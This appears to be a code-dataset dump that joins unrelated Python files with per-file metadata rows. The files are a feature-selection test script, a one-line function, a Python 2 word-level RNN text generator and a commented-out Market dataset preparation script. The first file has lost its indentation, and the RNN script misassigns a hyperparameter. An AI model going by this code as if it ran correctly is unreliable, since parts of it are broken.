seq_models = ["PlusLMinusR", "SFS", "SBS"]
if opt_model._name_ in rank_models:
assert len(opt_model.best_fits) == 1
assert len(opt_model.best_sol) == n_f
assert is_classifier(opt_model.model_best)
rank_models = ["GA", "SA", "PSO", "ACO", "DE"]
if opt_model._name_ in rank_models:
assert len(opt_model.rankings) == 2
assert opt_model.display_results() is not None
elif opt_model._name_ in seq_models:
if opt_model._name_ != "SBS":
assert len(opt_model.best_fits) == n_f
assert len(opt_model.best_sol) == n_f
assert is_classifier(opt_model.model_best)
assert opt_model.display_results() is not None
else:
assert len(opt_model.best_sol) == n_f
assert is_classifier(opt_model.model_best)
assert opt_model.display_results() is not None
else:
result_df = opt_model.res_df
assert isinstance(result_df, pd.core.frame.DataFrame)
assert opt_model.display_results(0) is not None
plt.close('all')
pbar.update(1)
def test_all_regression():
global pbar
cv = KFold(5)
n_f = 5
x, y = make_regression(100, 10)
model = SVR()
# regression
# with CV
pbar = tqdm(total=18)
ga_opt_model = GA(model, n_f, +1, r2_score, n_gen=1,
n_pop=20, cv=cv, verbose=False)
sa_opt_model = SA(model, n_f, +1, r2_score, n_iter=1,
n_sub_iter=20, cv=cv, verbose=False)
de_opt_model = DE(model, n_f, +1, r2_score, n_iter=1,
n_pop=20, cv=cv, verbose=False)
aco_opt_model = ACO(model, n_f, +1, r2_score, n_iter=1,
n_ant=20, cv=cv, verbose=False)
pso_opt_model = PSO(model, n_f, +1, r2_score, n_iter=1,
n_pop=20, cv=cv, verbose=False)
lrs_opt_model = PlusLMinusR(model, n_f, +1, r2_score, cv=cv, verbose=False)
nsga_opt_model = NSGA2(model, n_f, (+1, -1), r2_score,
n_gen=1, n_pop=20, cv=cv, verbose=False)
sbs_opt_model = SBS(model, n_f, +1, r2_score, cv=cv, verbose=False)
sfs_opt_model = SFS(model, n_f, +1, r2_score, cv=cv, verbose=False)
ga_opt_model.fit(x, y, decor=0.95, scale=True)
sa_opt_model.fit(x, y, decor=0.95, scale=True)
de_opt_model.fit(x, y, decor=0.95, scale=True)
aco_opt_model.fit(x, y, decor=0.95, scale=True)
pso_opt_model.fit(x, y, decor=0.95, scale=True)
lrs_opt_model.fit(x, y, decor=0.95, scale=True)
nsga_opt_model.fit(x, y, decor=0.95, scale=True)
sbs_opt_model.fit(x, y, decor=0.95, scale=True)
sfs_opt_model.fit(x, y, decor=0.95, scale=True)
eval_opt_model_output_regression(ga_opt_model, n_f)
eval_opt_model_output_regression(sa_opt_model, n_f)
eval_opt_model_output_regression(de_opt_model, n_f)
eval_opt_model_output_regression(aco_opt_model, n_f)
eval_opt_model_output_regression(pso_opt_model, n_f)
eval_opt_model_output_regression(lrs_opt_model, n_f)
eval_opt_model_output_regression(nsga_opt_model, n_f)
eval_opt_model_output_regression(sbs_opt_model, n_f)
eval_opt_model_output_regression(sfs_opt_model, n_f)
# with test size
ga_opt_model = GA(model, n_f, +1, r2_score, n_gen=1,
n_pop=20, cv=None, verbose=False)
sa_opt_model = SA(model, n_f, +1, r2_score, n_iter=1,
n_sub_iter=20, cv=None, verbose=False)
de_opt_model = DE(model, n_f, +1, r2_score, n_iter=1,
n_pop=20, cv=None, verbose=False)
aco_opt_model = ACO(model, n_f, +1, r2_score, n_iter=1,
n_ant=20, cv=None, verbose=False)
pso_opt_model = PSO(model, n_f, +1, r2_score, n_iter=1,
n_pop=20, cv=None, verbose=False)
lrs_opt_model = PlusLMinusR(
model, n_f, +1, r2_score, cv=None, verbose=False)
nsga_opt_model = NSGA2(model, n_f, (+1, -1), r2_score,
n_gen=1, n_pop=20, cv=None, verbose=False)
sbs_opt_model = SBS(model, n_f, +1, r2_score, cv=None, verbose=False)
sfs_opt_model = SFS(model, n_f, +1, r2_score, cv=None, verbose=False)
ga_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
sa_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
de_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
aco_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
pso_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
lrs_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
nsga_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
sbs_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
sfs_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
eval_opt_model_output_regression(ga_opt_model, n_f)
eval_opt_model_output_regression(sa_opt_model, n_f)
eval_opt_model_output_regression(de_opt_model, n_f)
eval_opt_model_output_regression(aco_opt_model, n_f)
eval_opt_model_output_regression(pso_opt_model, n_f)
eval_opt_model_output_regression(lrs_opt_model, n_f)
eval_opt_model_output_regression(nsga_opt_model, n_f)
eval_opt_model_output_regression(sbs_opt_model, n_f)
eval_opt_model_output_regression(sfs_opt_model, n_f)
def test_all_classification():
global pbar
cv = KFold(5)
n_f = 5
x, y = make_classification(100, 10)
model = SVC(probability=True)
# regression
# with CV
pbar = tqdm(total=18)
ga_opt_model = GA(model, n_f, +1, r2_score, n_gen=1,
n_pop=20, cv=cv, verbose=False)
sa_opt_model = SA(model, n_f, +1, r2_score, n_iter=1,
n_sub_iter=20, cv=cv, verbose=False)
de_opt_model = DE(model, n_f, +1, r2_score, n_iter=1,
n_pop=20, cv=cv, verbose=False)
aco_opt_model = ACO(model, n_f, +1, r2_score, n_iter=1,
n_ant=20, cv=cv, verbose=False)
pso_opt_model = PSO(model, n_f, +1, r2_score, n_iter=1,
n_pop=20, cv=cv, verbose=False)
lrs_opt_model = PlusLMinusR(model, n_f, +1, r2_score, cv=cv, verbose=False)
nsga_opt_model = NSGA2(model, n_f, (+1, -1), r2_score,
n_gen=1, n_pop=20, cv=cv, verbose=False)
sbs_opt_model = SBS(model, n_f, +1, r2_score, cv=cv, verbose=False)
sfs_opt_model = SFS(model, n_f, +1, r2_score, cv=cv, verbose=False)
ga_opt_model.fit(x, y, decor=0.95, scale=True)
sa_opt_model.fit(x, y, decor=0.95, scale=True)
de_opt_model.fit(x, y, decor=0.95, scale=True)
aco_opt_model.fit(x, y, decor=0.95, scale=True)
pso_opt_model.fit(x, y, decor=0.95, scale=True)
lrs_opt_model.fit(x, y, decor=0.95, scale=True)
nsga_opt_model.fit(x, y, decor=0.95, scale=True)
sbs_opt_model.fit(x, y, decor=0.95, scale=True)
sfs_opt_model.fit(x, y, decor=0.95, scale=True)
eval_opt_model_output_classification(ga_opt_model, n_f)
eval_opt_model_output_classification(sa_opt_model, n_f)
eval_opt_model_output_classification(de_opt_model, n_f)
eval_opt_model_output_classification(aco_opt_model, n_f)
eval_opt_model_output_classification(pso_opt_model, n_f)
eval_opt_model_output_classification(lrs_opt_model, n_f)
eval_opt_model_output_classification(nsga_opt_model, n_f)
eval_opt_model_output_classification(sbs_opt_model, n_f)
eval_opt_model_output_classification(sfs_opt_model, n_f)
# with test size
ga_opt_model = GA(model, n_f, +1, r2_score, n_gen=1,
n_pop=20, cv=None, verbose=False)
sa_opt_model = SA(model, n_f, +1, r2_score, n_iter=1,
n_sub_iter=20, cv=None, verbose=False)
de_opt_model = DE(model, n_f, +1, r2_score, n_iter=1,
n_pop=20, cv=None, verbose=False)
aco_opt_model = ACO(model, n_f, +1, r2_score, n_iter=1,
n_ant=20, cv=None, verbose=False)
pso_opt_model = PSO(model, n_f, +1, r2_score, n_iter=1,
n_pop=20, cv=None, verbose=False)
lrs_opt_model = PlusLMinusR(
model, n_f, +1, r2_score, cv=None, verbose=False)
nsga_opt_model = NSGA2(model, n_f, (+1, -1), r2_score,
n_gen=1, n_pop=20, cv=None, verbose=False)
sbs_opt_model = SBS(model, n_f, +1, r2_score, cv=None, verbose=False)
sfs_opt_model = SFS(model, n_f, +1, r2_score, cv=None, verbose=False)
ga_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
sa_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
de_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
aco_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
pso_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
lrs_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
nsga_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
sbs_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
sfs_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
eval_opt_model_output_classification(ga_opt_model, n_f)
eval_opt_model_output_classification(sa_opt_model, n_f)
eval_opt_model_output_classification(de_opt_model, n_f)
eval_opt_model_output_classification(aco_opt_model, n_f)
eval_opt_model_output_classification(pso_opt_model, n_f)
eval_opt_model_output_classification(lrs_opt_model, n_f)
eval_opt_model_output_classification(nsga_opt_model, n_f)
eval_opt_model_output_classification(sbs_opt_model, n_f)
eval_opt_model_output_classification(sfs_opt_model, n_f)
if __name__ == '__main__':
test_all_regression()
test_all_classification()
print(" ")
print("All tests passed!")
| 45.102767 | 80 | 0.67023 | 1,976 | 11,411 | 3.526822 | 0.062753 | 0.210073 | 0.074329 | 0.098149 | 0.918066 | 0.909026 | 0.909026 | 0.905869 | 0.905869 | 0.905869 | 0 | 0.037515 | 0.212777 | 11,411 | 252 | 81 | 45.281746 | 0.738283 | 0.012444 | 0 | 0.888889 | 0 | 0 | 0.009596 | 0 | 0 | 0 | 0 | 0 | 0.12963 | 1 | 0.018519 | false | 0.00463 | 0.050926 | 0 | 0.069444 | 0.009259 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d3635ad98eac34644d41591f180b459df7dae6ed | 27 | py | Python | week_0_to_2/inclass/test/sub2/cake_recipes.py | ScriptingBeyondCS/CS-35 | 1ee6135bbb2b8cfa5961007ccafbe77a2356020d | [
"MIT"
] | null | null | null | week_0_to_2/inclass/test/sub2/cake_recipes.py | ScriptingBeyondCS/CS-35 | 1ee6135bbb2b8cfa5961007ccafbe77a2356020d | [
"MIT"
] | null | null | null | week_0_to_2/inclass/test/sub2/cake_recipes.py | ScriptingBeyondCS/CS-35 | 1ee6135bbb2b8cfa5961007ccafbe77a2356020d | [
"MIT"
] | null | null | null | def getFive():
return 5 | 13.5 | 14 | 0.62963 | 4 | 27 | 4.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.05 | 0.259259 | 27 | 2 | 15 | 13.5 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
d392cb95337f1359637a26c016fd8e9968c765a2 | 18,489 | py | Python | Lil JadenBot/word-rnn.py | oduwa/pyRNN | d6c60724da68b76e2e9cf941431e6aa67ee0f329 | [
"MIT"
] | null | null | null | Lil JadenBot/word-rnn.py | oduwa/pyRNN | d6c60724da68b76e2e9cf941431e6aa67ee0f329 | [
"MIT"
] | null | null | null | Lil JadenBot/word-rnn.py | oduwa/pyRNN | d6c60724da68b76e2e9cf941431e6aa67ee0f329 | [
"MIT"
] | null | null | null | import numpy as np
import nltk
import pickle
import random
import argparse
# parse cli arguments
ap = argparse.ArgumentParser(description="Minimal RNN for text generation")
ap.add_argument('-t', '--train', help = 'Set this flag to train the RNN', action='store_true', default=False)
ap.add_argument('-t2', '--train2', help = 'Set this flag to train the RNN from the last point', action='store_true', default=False)
ap.add_argument('-f', '--file', help = 'The seed file for training or text generation', required=False)
args = vars(ap.parse_args())
filename = args['file']
isTrainingPhase = args['train']
isContinuingTraining = args['train2']
if(args['file']):
filename = args['file']
else:
filename = 'fanfic2.txt'
if(isTrainingPhase):
print("-------- TRAINING --------")
# data I/O
data_file = filename
data = open(data_file, 'r').read()
#print data
data_words = nltk.word_tokenize(data.decode('utf8'))
# Make input into a set to remove duplicates and then make it into a list
words = list(set(data_words))
data_size, vocab_size = len(data_words), len(words)
print 'Data has %d characters, %d unique.' % (data_size,vocab_size)
# Create dictionaries mapping a word to an index and vice versa
word_to_ix = { ch:i for i,ch in enumerate(words) }
ix_to_word = { i:ch for i,ch in enumerate(words) }
# hyperparameters
hidden_size = 100 # size of hidden layer of neurons
seq_length = 25 # number of steps to unroll the RNN for
learning_rate = 1e-1
# initialise model parameters
Wxh = np.random.randn(hidden_size, vocab_size)*0.01 # input to hidden
Whh = np.random.randn(hidden_size, hidden_size)*0.01 # hidden to hidden
Why = np.random.randn(vocab_size, hidden_size)*0.01 # hidden to output
bh = np.zeros((hidden_size, 1)) # hidden bias
by = np.zeros((vocab_size, 1)) # output bias
# Initialise rnn for serialization
rnn = {}
rnn["hidden_size"] = hidden_size
rnn["seq_length"] = seq_length
rnn["learning_rate"] = learning_rate
def lossFun(inputs, targets, hprev):
"""
inputs,targets are both list of integers.
hprev is Hx1 array of initial hidden state
returns the loss, gradients on model parameters, and last hidden state
"""
# dictionaries for values at each timestep indexed by timestep
# xs[t]-> input_t, hs[t]->hiddenState_t, ys[t]->output_t, ps[t]->probabilities_t,
xs, hs, ys, ps = {}, {}, {}, {}
hs[-1] = np.copy(hprev)
loss = 0
# FORWARD PASS
# Go through each timestep t
for t in xrange(len(inputs)):
# encode input in one-hot encoding (aka 1-of-k encoding)
xs[t] = np.zeros((vocab_size,1))
xs[t][inputs[t]] = 1
# Update our hidden state according to the recurrent function f_W(x_t, h_t-1)
# given as h_t = tanh(W_xh.x_t + W_hh.h_t-1 + bias)
hs[t] = np.tanh(np.dot(Wxh, xs[t]) + np.dot(Whh, hs[t-1]) + bh) # hidden state
# Compute our output
ys[t] = np.dot(Why, hs[t]) + by # unnormalized log probabilities for next chars
ps[t] = np.exp(ys[t]) / np.sum(np.exp(ys[t])) # probabilities for next chars
# Accumulate the loss for this time step as the negative log of the predicted probability.
# Ideally, we would have a probability of 1 for the actual next character. If it is 1, the loss is 0, log(1) = 0.
loss += -np.log(ps[t][targets[t],0]) # softmax (cross-entropy loss)
# BACKWARD PASS: compute gradients going backwards
dWxh, dWhh, dWhy = np.zeros_like(Wxh), np.zeros_like(Whh), np.zeros_like(Why) # Initialise gradients of weight matrices
dbh, dby = np.zeros_like(bh), np.zeros_like(by) # Initialise gradients of biases
dhnext = np.zeros_like(hs[0]) # Initialise gradient for next timestep
for t in reversed(xrange(len(inputs))):
dy = np.copy(ps[t])
dy[targets[t]] -= 1 # backprop into y. see http://cs231n.github.io/neural-networks-case-study/#grad if confused here
dWhy += np.dot(dy, hs[t].T)
dby += dy
dh = np.dot(Why.T, dy) + dhnext # backprop into h
dhraw = (1 - hs[t] * hs[t]) * dh # backprop through tanh nonlinearity
dbh += dhraw
dWxh += np.dot(dhraw, xs[t].T)
dWhh += np.dot(dhraw, hs[t-1].T)
dhnext = np.dot(Whh.T, dhraw)
for dparam in [dWxh, dWhh, dWhy, dbh, dby]:
np.clip(dparam, -5, 5, out=dparam) # clip to mitigate exploding gradients
rnn["loss"] = loss
rnn["dWxh"] = dWxh
rnn["dWhh"] = dWhh
rnn["dWhy"] = dWhy
rnn["dbh"] = dbh
rnn["dby"] = dby
rnn["Wxh"] = Wxh
rnn["Whh"] = Whh
rnn["Why"] = Why
rnn["bh"] = bh
rnn["by"] = by
return loss, dWxh, dWhh, dWhy, dbh, dby, hs[len(inputs)-1]
def sample(h, seed_ix, n):
"""
sample a sequence of integers from the model
h is memory state, seed_ix is seed letter for first time step
"""
# Set up our one-hot encoded input vector based on the seed character.
x = np.zeros((vocab_size, 1))
x[seed_ix] = 1
# Set up an array to keep track of our sequence.
ixes = []
# For each timestep
for t in xrange(n):
# Update hidden state and generate output and apply softmax to get probabilities
h = np.tanh(np.dot(Wxh, x) + np.dot(Whh, h) + bh)
y = np.dot(Why, h) + by
p = np.exp(y) / np.sum(np.exp(y))
# Select the index of the character with the highest probability
ix = np.random.choice(range(vocab_size), p=p.ravel())
# Create new one-hot encoding input for selected character
x = np.zeros((vocab_size, 1))
x[ix] = 1
ixes.append(ix)
return ixes
# TRAINING
# n is the number of training iterations we've done. p is the index into our training data for where we are now.
n, p = 0, 0
# Set up memory variables for the Adagrad algorithm
mWxh, mWhh, mWhy = np.zeros_like(Wxh), np.zeros_like(Whh), np.zeros_like(Why)
mbh, mby = np.zeros_like(bh), np.zeros_like(by) # memory variables for Adagrad
smooth_loss = -np.log(1.0/vocab_size)*seq_length # loss at iteration 0
# Trraining loop
try:
while True:
# prepare inputs (we're sweeping from left to right in steps seq_length long)
if p+seq_length+1 >= len(data_words) or n == 0:
hprev = np.zeros((hidden_size,1)) # reset RNN memory
p = 0 # go from start of data
# Fetch inputs and targets of length seq_length at a time
inputs = [word_to_ix[w] for w in data_words[p:p+seq_length]]
# we're predicting the next character so the target for data[i] is data[i+1]
targets = [word_to_ix[w] for w in data_words[p+1:p+seq_length+1]]
# print to the terminal a sample every 100 training steps so we can see how its doing
if n % 100 == 0:
sample_ix = sample(hprev, inputs[0], 200)
txt = ' '.join(ix_to_word[ix] for ix in sample_ix)
print '----\n %s \n----' % (txt, )
# forward seq_length characters through the net and fetch gradient
loss, dWxh, dWhh, dWhy, dbh, dby, hprev = lossFun(inputs, targets, hprev)
smooth_loss = smooth_loss * 0.999 + loss * 0.001 # Adagrad stuff
if n % 100 == 0: print 'iter %d, loss: %f' % (n, smooth_loss) # print progress
# perform parameter update with Adagrad
for param, dparam, mem in zip([Wxh, Whh, Why, bh, by],
[dWxh, dWhh, dWhy, dbh, dby],
[mWxh, mWhh, mWhy, mbh, mby]):
mem += dparam * dparam
param += -learning_rate * dparam / np.sqrt(mem + 1e-8) # adagrad update
p += seq_length # move data pointer tonext chunk of size seq_length
n += 1 # iteration counter
rnn["h"] = hprev
rnn["nuber_of_iterations"] = n
rnn["position_in_data"] = p
except KeyboardInterrupt:
#Serialize hidden state to use for prediction later
f = open('rnn.ser', 'wb')
pickle.dump(rnn, f)
f.close()
exit()
elif(isContinuingTraining):
print("-------- RESUMING TRAINING FROM SERIALIZED POINT --------")
# Load serialized rnn parameters
f = open("rnn.ser", 'rb')
rnn = pickle.load(f)
f.close()
# data I/O
data_file = filename
data = open(data_file, 'r').read()
#print data
data_words = nltk.word_tokenize(data.decode('utf8'))
# Make input into a set to remove duplicates and then make it into a list
words = list(set(data_words))
data_size, vocab_size = len(data_words), len(words)
print 'Data has %d characters, %d unique.' % (data_size,vocab_size)
# Create dictionaries mapping a word to an index and vice versa
word_to_ix = { ch:i for i,ch in enumerate(words) }
ix_to_word = { i:ch for i,ch in enumerate(words) }
# hyperparameters
hidden_size = 100 # size of hidden layer of neurons
seq_length = 25 # number of steps to unroll the RNN for
learning_rate = 1e-1
# Model weights and biases
Wxh = rnn["Wxh"]
Whh = rnn["Whh"]
Why = rnn["Why"]
bh = rnn["bh"]
by = rnn["by"]
hprev = rnn["h"]
# Load rnn parameters
hidden_size = rnn["hidden_size"]
seq_length = rnn["seq_length"]
learning_rate = rnn["learning_rate"]
def lossFun(inputs, targets, hprev):
"""
inputs,targets are both list of integers.
hprev is Hx1 array of initial hidden state
returns the loss, gradients on model parameters, and last hidden state
"""
# dictionaries for values at each timestep indexed by timestep
# xs[t]-> input_t, hs[t]->hiddenState_t, ys[t]->output_t, ps[t]->probabilities_t,
xs, hs, ys, ps = {}, {}, {}, {}
hs[-1] = np.copy(hprev)
loss = 0
# FORWARD PASS
# Go through each timestep t
for t in xrange(len(inputs)):
# encode input in one-hot encoding (aka 1-of-k encoding)
xs[t] = np.zeros((vocab_size,1))
xs[t][inputs[t]] = 1
# Update our hidden state according to the recurrent function f_W(x_t, h_t-1)
# given as h_t = tanh(W_xh.x_t + W_hh.h_t-1 + bias)
hs[t] = np.tanh(np.dot(Wxh, xs[t]) + np.dot(Whh, hs[t-1]) + bh) # hidden state
# Compute our output
ys[t] = np.dot(Why, hs[t]) + by # unnormalized log probabilities for next chars
ps[t] = np.exp(ys[t]) / np.sum(np.exp(ys[t])) # probabilities for next chars
# Accumulate the loss for this time step as the negative log of the predicted probability.
# Ideally, we would have a probability of 1 for the actual next character. If it is 1, the loss is 0, log(1) = 0.
loss += -np.log(ps[t][targets[t],0]) # softmax (cross-entropy loss)
# BACKWARD PASS: compute gradients going backwards
dWxh, dWhh, dWhy = np.zeros_like(Wxh), np.zeros_like(Whh), np.zeros_like(Why) # Initialise gradients of weight matrices
dbh, dby = np.zeros_like(bh), np.zeros_like(by) # Initialise gradients of biases
dhnext = np.zeros_like(hs[0]) # Initialise gradient for next timestep
for t in reversed(xrange(len(inputs))):
dy = np.copy(ps[t])
dy[targets[t]] -= 1 # backprop into y. see http://cs231n.github.io/neural-networks-case-study/#grad if confused here
dWhy += np.dot(dy, hs[t].T)
dby += dy
dh = np.dot(Why.T, dy) + dhnext # backprop into h
dhraw = (1 - hs[t] * hs[t]) * dh # backprop through tanh nonlinearity
dbh += dhraw
dWxh += np.dot(dhraw, xs[t].T)
dWhh += np.dot(dhraw, hs[t-1].T)
dhnext = np.dot(Whh.T, dhraw)
for dparam in [dWxh, dWhh, dWhy, dbh, dby]:
np.clip(dparam, -5, 5, out=dparam) # clip to mitigate exploding gradients
rnn["loss"] = loss
rnn["dWxh"] = dWxh
rnn["dWhh"] = dWhh
rnn["dWhy"] = dWhy
rnn["dbh"] = dbh
rnn["dby"] = dby
rnn["Wxh"] = Wxh
rnn["Whh"] = Whh
rnn["Why"] = Why
rnn["bh"] = bh
rnn["by"] = by
return loss, dWxh, dWhh, dWhy, dbh, dby, hs[len(inputs)-1]
def sample(h, seed_ix, n):
"""
sample a sequence of integers from the model
h is memory state, seed_ix is seed letter for first time step
"""
# Set up our one-hot encoded input vector based on the seed character.
x = np.zeros((vocab_size, 1))
x[seed_ix] = 1
# Set up an array to keep track of our sequence.
ixes = []
# For each timestep
for t in xrange(n):
# Update hidden state and generate output and apply softmax to get probabilities
h = np.tanh(np.dot(Wxh, x) + np.dot(Whh, h) + bh)
y = np.dot(Why, h) + by
p = np.exp(y) / np.sum(np.exp(y))
# Select the index of the character with the highest probability
ix = np.random.choice(range(vocab_size), p=p.ravel())
# Create new one-hot encoding input for selected character
x = np.zeros((vocab_size, 1))
x[ix] = 1
ixes.append(ix)
return ixes
# TRAINING
# n is the number of training iterations we've done. p is the index into our training data for where we are now.
n = rnn["nuber_of_iterations"]
p = rnn["position_in_data"]
# Set up memory variables for the Adagrad algorithm
mWxh, mWhh, mWhy = np.zeros_like(Wxh), np.zeros_like(Whh), np.zeros_like(Why)
mbh, mby = np.zeros_like(bh), np.zeros_like(by) # memory variables for Adagrad
smooth_loss = -np.log(1.0/vocab_size)*seq_length # loss at iteration 0
# Training loop
print "ITERTIONS: %d , DATA POS: %d" % (n,p)
try:
while True:
# prepare inputs (we're sweeping from left to right in steps seq_length long)
if p+seq_length+1 >= len(data_words) or n == 0:
hprev = np.zeros((hidden_size,1)) # reset RNN memory
p = 0 # go from start of data
# Fetch inputs and targets of length seq_length at a time
inputs = [word_to_ix[w] for w in data_words[p:p+seq_length]]
# we're predicting the next character so the target for data[i] is data[i+1]
targets = [word_to_ix[w] for w in data_words[p+1:p+seq_length+1]]
# print to the terminal a sample every 100 training steps so we can see how its doing
if n % 100 == 0:
sample_ix = sample(hprev, inputs[0], 200)
txt = ' '.join(ix_to_word[ix] for ix in sample_ix)
print '----\n %s \n----' % (txt, )
# forward seq_length characters through the net and fetch gradient
loss, dWxh, dWhh, dWhy, dbh, dby, hprev = lossFun(inputs, targets, hprev)
smooth_loss = smooth_loss * 0.999 + loss * 0.001 # Adagrad stuff
if n % 100 == 0: print 'iter %d, loss: %f' % (n, smooth_loss) # print progress
# perform parameter update with Adagrad
for param, dparam, mem in zip([Wxh, Whh, Why, bh, by],
[dWxh, dWhh, dWhy, dbh, dby],
[mWxh, mWhh, mWhy, mbh, mby]):
mem += dparam * dparam
param += -learning_rate * dparam / np.sqrt(mem + 1e-8) # adagrad update
p += seq_length # move data pointer tonext chunk of size seq_length
n += 1 # iteration counter
rnn["h"] = hprev
rnn["nuber_of_iterations"] = n
rnn["position_in_data"] = p
except KeyboardInterrupt:
#Serialize hidden state to use for prediction later
f = open('rnn.ser', 'wb')
pickle.dump(rnn, f)
f.close()
exit()
else:
# data I/O
data_file = filename
data = open(data_file, 'r').read()
#print data
data_words = nltk.word_tokenize(data.decode('utf8'))
# Make input into a set to remove duplicates and then make it into a list
words = list(set(data_words))
data_size, vocab_size = len(data_words), len(words)
print 'Data has %d characters, %d unique.' % (data_size,vocab_size)
# Load serialized rnn parameters
f = open("rnn_jaden.ser", 'rb')
rnn = pickle.load(f)
f.close()
# model hyperparameters
hidden_size = rnn["hidden_size"]
seq_length = rnn["seq_length"]
seq_length = rnn["learning_rate"]
# Create dictionaries mapping a word to an index and vice versa
word_to_ix = { ch:i for i,ch in enumerate(words) }
ix_to_word = { i:ch for i,ch in enumerate(words) }
# Model weights and biases
Wxh = rnn["Wxh"]
Whh = rnn["Whh"]
Why = rnn["Why"]
bh = rnn["bh"]
by = rnn["by"]
h = rnn["h"]
def sample(h, seed_ix, n):
"""
sample a sequence of integers from the model
h is memory state, seed_ix is seed letter for first time step
"""
# Set up our one-hot encoded input vector based on the seed character.
x = np.zeros((vocab_size, 1))
x[seed_ix] = 1
# Set up an array to keep track of our sequence.
ixes = []
# For each timestep
for t in xrange(n):
# Update hidden state and generate output and apply softmax to get probabilities
h = np.tanh(np.dot(Wxh, x) + np.dot(Whh, h) + bh)
y = np.dot(Why, h) + by
p = np.exp(y) / np.sum(np.exp(y))
# Select the index of the character with the highest probability
ix = np.random.choice(range(vocab_size), p=p.ravel())
# Create new one-hot encoding input for selected character
x = np.zeros((vocab_size, 1))
x[ix] = 1
ixes.append(ix)
return ixes
# Sample and generate words
sample_ix = sample(h, word_to_ix[random.choice(data_words)], 200)
txt = ' '.join(ix_to_word[ix] for ix in sample_ix)
print '----\n %s \n----' % (txt, )
| 41.362416 | 131 | 0.584456 | 2,737 | 18,489 | 3.867738 | 0.126416 | 0.022483 | 0.02286 | 0.013603 | 0.917249 | 0.909975 | 0.909975 | 0.89864 | 0.875401 | 0.875401 | 0 | 0.013204 | 0.299529 | 18,489 | 446 | 132 | 41.455157 | 0.804185 | 0.308237 | 0 | 0.860806 | 0 | 0 | 0.075962 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.018315 | null | null | 0.040293 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d395e1bc5e809649e705f3337f40fd55712924b5 | 8,433 | py | Python | prepare.py | Prettyfinger/Twostream_reID | 8e340e0c03bd248b04ff1b48398ca99b6aeaa508 | [
"MIT"
] | 6 | 2019-05-17T03:40:59.000Z | 2021-04-09T11:01:54.000Z | prepare.py | Prettyfinger/Twostream_reID | 8e340e0c03bd248b04ff1b48398ca99b6aeaa508 | [
"MIT"
] | null | null | null | prepare.py | Prettyfinger/Twostream_reID | 8e340e0c03bd248b04ff1b48398ca99b6aeaa508 | [
"MIT"
] | 2 | 2019-09-12T06:19:05.000Z | 2020-06-12T11:34:12.000Z | #*************RGB***********************
# import os
# from shutil import copyfile
#
# # You only need to change this line to your dataset download path
# download_path = '../Market'
#
# if not os.path.isdir(download_path):
# print('please change the download_path')
#
# save_path = download_path + '/pytorch'
# if not os.path.isdir(save_path):
# os.mkdir(save_path)
# #-----------------------------------------
# #query
# query_path = download_path + '/query'
# query_save_path = download_path + '/pytorch/query'
# if not os.path.isdir(query_save_path):
# os.mkdir(query_save_path)
#
# for root, dirs, files in os.walk(query_path, topdown=True):
# for name in files:
# if not name[-3:]=='jpg':
# continue
# ID = name.split('_')
# src_path = query_path + '/' + name
# dst_path = query_save_path + '/' + ID[0]
# if not os.path.isdir(dst_path):
# os.mkdir(dst_path)
# copyfile(src_path, dst_path + '/' + name)
#
# #-----------------------------------------
# #multi-query
# query_path = download_path + '/gt_bbox'
# # for dukemtmc-reid, we do not need multi-query
# if os.path.isdir(query_path):
# query_save_path = download_path + '/pytorch/multi-query'
# if not os.path.isdir(query_save_path):
# os.mkdir(query_save_path)
#
# for root, dirs, files in os.walk(query_path, topdown=True):
# for name in files:
# if not name[-3:]=='jpg':
# continue
# ID = name.split('_')
# src_path = query_path + '/' + name
# dst_path = query_save_path + '/' + ID[0]
# if not os.path.isdir(dst_path):
# os.mkdir(dst_path)
# copyfile(src_path, dst_path + '/' + name)
#
# #-----------------------------------------
# #gallery
# gallery_path = download_path + '/bounding_box_test'
# gallery_save_path = download_path + '/pytorch/gallery'
# if not os.path.isdir(gallery_save_path):
# os.mkdir(gallery_save_path)
#
# for root, dirs, files in os.walk(gallery_path, topdown=True):
# for name in files:
# if not name[-3:]=='jpg':
# continue
# ID = name.split('_')
# src_path = gallery_path + '/' + name
# dst_path = gallery_save_path + '/' + ID[0]
# if not os.path.isdir(dst_path):
# os.mkdir(dst_path)
# copyfile(src_path, dst_path + '/' + name)
#
# #---------------------------------------
